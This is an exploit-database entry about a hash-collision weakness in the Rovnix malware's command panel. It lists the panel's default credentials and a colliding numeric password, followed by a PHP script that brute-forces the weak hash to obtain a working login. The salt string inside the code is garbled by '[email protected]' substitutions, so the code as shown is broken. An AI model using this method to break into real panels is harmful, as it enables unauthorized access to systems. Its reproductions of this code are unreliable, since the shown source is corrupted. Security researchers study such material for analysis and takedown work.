Rovnix hash collision vulnerability

2013-12-12T00:00:00
ID 1337DAY-ID-21659
Type zdt
Reporter Xylitol
Modified 2013-12-12T00:00:00

Description

Exploitation of a weakness in Rovnix malicious software hash function. The default password on Rovnix panel are 'admin' admin = fbff791ef0770855e599ea6f87d41653 but you can log with '21173' This exploit will defeat the weak hash function of Rovnix to get password from a hash.

                                        
                                            <?php
        /**
         * Defeat the weak hash function of Rovnix
         * to get password from a hash.
         */
     
        $HASH   = 'fbff791ef0770855e599ea6f87d41653';
     
        $value  = getNumber($HASH);
        $search = search($value, $HASH);
     
        echo('Hash:   ' . $HASH  . '<br />');
        echo('Value:  ' . $value . '<br />');
        echo('Search: ' . $search);
     
        // Search an working (number) password
        function search($value, $hash) {
                $i = 0;
             
                while (true) {
                        if (getHash($i) == $value)
                                return $i;
                     
                        $i++;
                }
        }
     
        // Get the hashed number
        function getNumber($hash) {
                $i = 0;
             
                while (true) {
                        if (md5($i) == $hash)
                                return $i;
                     
                        $i++;
                }
        }
     
        // Hash function without final MD5 (return only numbers)
        function getHash($hash) {
                $salt = 'LKJFDJLJkkljKJKJKJkjkj$i%&@(%[email protected]@[email protected]!cdh*[email protected]#[email protected]*[email protected]$jkeJFJLEJFE';
             
                return $hash + $salt + md5($salt) + md5($hash) + $salt[3];
        }
?>

#  0day.today [2018-01-05]  #